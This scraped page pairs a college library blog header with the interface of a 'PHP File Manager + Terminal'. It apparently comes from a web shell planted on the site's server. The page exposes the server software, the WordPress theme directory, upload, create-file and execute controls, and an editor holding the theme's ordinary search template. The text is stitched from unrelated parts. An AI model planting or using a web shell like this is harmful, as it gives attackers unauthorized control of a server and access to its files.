Looking for something? Use OneSearch! Posted on January 23, 2020 (February 3, 2025) by Rebecca Hyams PHP File Manager + Terminal PHP File Manager + TerminalServer: www.bmcc.cuny.eduSoftware: Apache/2.4.62 (Debian)Current directory: //var/www/html/sfac/wp-content/themes/neve Upload Create File Create Folder Execute Editing: /var/www/html/sfac/wp-content/themes/neve/search.php<?php /** * Author: Andrei Baicus <andrei@themeisle.com> * Created on: 04/09/2018 * * @package Neve */ $container_class = apply_filters( 'neve_container_class_filter', 'container', 'blog-archive' ); get_header(); ?> <div class="<?php echo esc_attr( $container_class ); ?> archive-container"> <div class="row"> <?php do_action( 'neve_do_sidebar', 'blog-archive', 'left' ); ?> <div class="nv-index-posts search col"> <?php do_action( 'neve_page_header', 'search' ); if ( have_posts() ) { /* Start the Loop. */ echo '<div class="posts-wrapper row">'; while ( have_posts() ) { the_post(); get_template_part( 'template-parts/content' ); } echo '</div>'; if ( ! is_singular() ) { do_action( 'neve_do_pagination', 'blog-archive' ); } } else { get_template_part( 'template-parts/content', 'none' ); } ?> <div class="w-100"></div> </div> <?php do_action( 'neve_do_sidebar', 'blog-archive', 'right' ); ?> </div> </div> <?php get_footer(); Save